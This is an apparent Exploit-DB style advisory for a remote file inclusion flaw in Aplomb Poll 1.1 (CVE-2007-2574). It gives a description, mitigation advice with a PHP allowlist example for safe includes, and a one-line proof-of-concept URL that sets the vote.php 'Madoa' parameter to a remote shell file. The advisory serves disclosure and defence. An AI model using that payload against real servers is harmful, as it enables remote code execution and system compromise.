Vendor: Aplomb Poll
By: Unknown
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Inclusion
CWE: 98
Product Name: Aplomb Poll
Affected Version From: 1.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-2574
CPE: a:aplomb_poll:aplomb_poll:1.1
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

Aplomb Poll Remote File Include Vulnerabilities

The Aplomb Poll application is prone to multiple remote file-include vulnerabilities due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to include a remote file containing malicious PHP code and execute it in the context of the webserver process. This can lead to compromise of the application and the underlying system, as well as other possible attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize and validate user-supplied input before using it to include files. Additionally, keeping the application and underlying system up to date with the latest security patches can help prevent exploitation.
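
One way to apply this mitigation, shown as an added example (not Aplomb Poll's own code and not part of the original advisory): the request value is used only as a key into a fixed server-side map, so it never reaches `include` as a path or URL. The page names, the `pages` directory and the `resolve_include` helper are hypothetical; `Madoa` is the parameter named in the advisory URL, and PHP 8 is assumed.

```php
<?php
declare(strict_types=1);

// Hypothetical page map: the only files a request is allowed to select.
// Keys are the values accepted from the client; file names are fixed server-side.
const ALLOWED_PAGES = [
    'results' => 'results.php',
    'form'    => 'form.php',
];

/**
 * Resolve a client-supplied selector to a local file, or return null.
 * The client value is only ever used as an array key, never as a path.
 */
function resolve_include(mixed $selector, string $baseDir): ?string
{
    // Reject arrays (?Madoa[]=x) and anything that is not a known key.
    if (!is_string($selector) || !array_key_exists($selector, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$selector]);
    // Defence in depth: the resolved file must exist inside the base directory.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// Constructed usage: a URL or any unknown value in 'Madoa' is refused with 400.
$target = resolve_include($_GET['Madoa'] ?? null, __DIR__ . '/pages');
if ($target === null) {
    http_response_code(400);
    exit('Invalid request');
}
require $target;
```

Keeping `allow_url_include = Off` in php.ini (its default) additionally stops `include` and `require` from fetching remote URLs even where such a check is missing.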
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25138/info
 
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
 
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
 
Aplomb Poll 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/vote.php?Madoa=http://sheel.txt?